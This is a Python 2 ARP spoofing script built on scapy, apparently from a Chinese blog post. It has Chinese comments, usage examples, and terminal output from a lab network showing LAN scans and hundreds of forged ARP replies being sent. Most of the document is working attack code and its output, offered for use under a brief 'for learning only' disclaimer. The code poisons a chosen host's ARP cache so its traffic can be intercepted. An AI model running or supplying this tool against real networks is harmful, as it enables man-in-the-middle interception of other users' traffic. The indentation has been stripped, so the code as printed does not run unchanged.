#!/usr/bin/python
#coding=utf-8
from scapy.all import ARP, arping, Ether, srp, send
import sys, getopt
def usage():
print "usage: python arpspoof.py -s 192.168.1.0/24"
print "python arpspoof.py -t 192.168.1.1 192.168.1.100"
#############
# arp scan #
#############
def arpscan(Lan):
e = Ether()
e.dst = "ff:ff:ff:ff:ff:ff"
a = ARP()
a.pdst=Lan
ans,unans=srp(e/a,timeout=2)
#ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%"))
#arping(sys.argv[1])
ipaddr_mac=[]
data={}
for s,r in ans:
ipaddr_mac.append(s[Ether].pdst)
ipaddr_mac.append(r[ARP].hwsrc)
data[s[Ether].pdst]=r[ARP].hwsrc
return ipaddr_mac, data
#################
# arp send #
#################
def arpsend(target, mac, host, num=-1):
a=ARP()
#op代表ARP数据包类型,01为请求包,02为应答包
a.op=2
#pdst目的端协IP地址
a.pdst=target
#hwdst目的端MAC地址
a.hwdst=mac
#psrc发送端IP地址
a.psrc=host
#hwsrc发送端MAC地址,
a.hwsrc="bb:bb:bb:cc:cc:cc"
send(a, loop=1, count=num)
def arpauto(Lan):
s,d=arpscan(Lan)
for i in range(len(s)/2):
print "[%d] %s %s" %(i, s[i*2+1], s[i*2])
D0=int(raw_input("[Add-0]:"))
print "Target0:", s[D0*2], d[s[D0*2]]
D1=int(raw_input("[Add-1]:"))
print "Target1", s[D1*2], d[s[D1*2]]
target=s[D0*2]
mac=d[s[D0*2]]
host=s[D1*2]
return target, mac, host
def arpmanually(Lan):
s,d=arpscan(Lan)
mac=d[Lan]
return mac
if __name__=="__main__":
if len(sys.argv[1:]) == 0:
usage()
sys.exit()
if len(sys.argv[1:]) > 0:
try:
opts, args = getopt.getopt(sys.argv[1:], "ht:p:s:v", ["help", "target="])
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-t", "--target"):
target = a
mac = arpmanually(target)
elif o == "-v":
print "arpspoof.py version 0.1"
sys.exit()
elif o == "-s":
Lan = a
target, mac, host = arpauto(Lan)
if o == "-p":
host = a
arpsend(target, mac, host)
显示帮助:
root@bt:~/Desktop# python arpspoof.py --help
WARNING: No route found for IPv6 destination :: (no default route?)
usage: python arpspoof.py -s 192.168.1.0/24
python arpspoof.py -t 192.168.1.1 192.168.1.100
命令行运行
root@bt:~/Desktop# python arpspoof.py -t 192.168.61.2 -p 192.168.61.144
WARNING: No route found for IPv6 destination :: (no default route?)
Begin emission:
*Finished to send 1 packets.
Received 1 packets, got 1 answers, remaining 0 packets
.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^C
Sent 529 packets.
支持交互命令行
root@bt:~/Desktop# python arpspoof.py -s 192.168.61.0/24
WARNING: No route found for IPv6 destination :: (no default route?)
Begin emission:
***Finished to send 256 packets.
*
Received 4 packets, got 4 answers, remaining 252 packets
[0] 00:50:56:c0:00:08 192.168.61.1
[1] 00:50:56:f8:16:3c 192.168.61.2
[2] 00:0c:29:bc:20:3b 192.168.61.144
[3] 00:50:56:e1:50:d9 192.168.61.254
[Add-0]:1
Target0: 192.168.61.2 00:50:56:f8:16:3c
[Add-1]:2
Target1 192.168.61.144 00:0c:29:bc:20:3b
.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................^C
Sent 461 packets.
python导入包
root@bt:~/Desktop# python
Python 2.6.5 (r265:79063, Apr 16 2010, 13:09:56)
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import arpspoof
WARNING: No route found for IPv6 destination :: (no default route?)
>>> s, d = arpspoof.arpscan("192.168.61.*")
Begin emission:
***Finished to send 256 packets.
*
Received 4 packets, got 4 answers, remaining 252 packets
>>> print s,"\n",d
['192.168.61.1', '00:50:56:c0:00:08', '192.168.61.2', '00:50:56:f8:16:3c', '192.168.61.144', '00:0c:29:bc:20:3b', '192.168.61.254', '00:50:56:e1:50:d9']
{'192.168.61.254': '00:50:56:e1:50:d9', '192.168.61.1': '00:50:56:c0:00:08', '192.168.61.2': '00:50:56:f8:16:3c', '192.168.61.144': '00:0c:29:bc:20:3b'}
>>> arpspoof.arpsend(target="192.168.61.144",mac="00:0c:29:bc:20:3b",host="192.168.61.2")
....................................................................................................................................................................................................................................................................................................................................................................^C
Sent 680 packets.
>>> arpspoof.arpsend(target="192.168.61.144",mac="00:0c:29:bc:20:3b",host="192.168.61.2",num=100)
....................................................................................................
Sent 100 packets.
此工具尽供学习,不得用作非法:
上两张测试图: